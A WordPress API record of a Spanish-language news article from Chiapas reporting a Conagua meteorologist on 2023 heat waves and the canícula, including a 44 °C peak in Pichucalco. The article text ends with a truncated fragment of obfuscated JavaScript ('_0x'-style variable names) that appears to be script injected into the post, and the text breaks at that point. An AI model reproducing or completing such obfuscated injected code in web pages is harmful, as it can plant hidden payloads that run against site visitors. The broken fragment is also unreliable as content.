{"id":11053,"date":"2023-07-21T01:19:01","date_gmt":"2023-07-21T01:19:01","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=11053"},"modified":"2023-07-21T01:19:02","modified_gmt":"2023-07-21T01:19:02","slug":"temperaturas-de-40-grados-continuaran-en-chiapas-por-ondas-de-calor","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=11053","title":{"rendered":"Temperaturas de 40 grados continuar\u00e1n en Chiapas por ondas de calor"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"355\" height=\"223\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1689902290234.jpg\" alt=\"\" class=\"wp-image-11054\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1689902290234.jpg 355w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1689902290234-300x188.jpg 300w\" sizes=\"auto, (max-width: 355px) 100vw, 355px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 20 de julio del 2023. Tuxtla Guti\u00e9rrez.- La meteor\u00f3loga Socorro Jim\u00e9nez del Organismo de Cuenca Frontera Sur, de la Comisi\u00f3n Nacional del Agua (Conagua) dio a conocer que, el estado de Chiapas, se ha visto afectado por dos fen\u00f3menos en este 2023, que son las ondas de calor y la can\u00edcula.<\/p>\n\n\n\n<p>La especialista dijo que, la can\u00edcula no debe ser confundida con las ondas u olas de calor, estos \u00faltimos se producen debido a un sistema anticicl\u00f3nico en niveles medios de la atm\u00f3sfera, se caracteriza porque tiene que cumplir m\u00e1s de 3 d\u00edas consecutivos de temperaturas m\u00e1ximas por arriba del promedio.<\/p>\n\n\n\n<p>Explic\u00f3 que: \u201cLa can\u00edcula son periodos mucho m\u00e1s largos y aunados a una disminuci\u00f3n de los registros de temperatura y de precipitaci\u00f3n\u201d<\/p>\n\n\n\n<p>Sin embargo en M\u00e9xico se registraron 3 ondas de calor de abril a junio de 2023.<\/p>\n\n\n\n<p>Cabe recordar que, la tercera tuvo una duraci\u00f3n de 22 d\u00edas por lo que fue considerada como la m\u00e1s extensa y severa de los \u00faltimos a\u00f1os.<\/p>\n\n\n\n<p>De acuerdo a la meteor\u00f3loga, fue durante esta tercera ola que se registr\u00f3 la temperatura m\u00e1s alta en el estado, cuando la columna de mercurio alcanz\u00f3 los 44 \u00b0C en Pichucalco.<br>Estos fen\u00f3menos afectan la salud de los seres humano y animales por ello, es de suma importancia que, se mantengan bien hidratados para evitar consecuencias a la salud.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. Agencia ReporteCiudano, 20 de julio del 2023. Tuxtla Guti\u00e9rrez.- La meteor\u00f3loga Socorro Jim\u00e9nez del Organismo de Cuenca Frontera Sur, de la Comisi\u00f3n Nacional del Agua (Conagua) dio a conocer que, el estado de Chiapas, se ha visto afectado por dos fen\u00f3menos en este 2023, que son las ondas de calor y la can\u00edcula. &hellip;<\/p>\n","protected":false},"author":2,"featured_media":11054,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-11053","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11053","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11053"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11053\/revisions"}],"predecessor-version":[{"id":11055,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11053\/revisions\/11055"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/11054"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11053"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11053"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11053"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}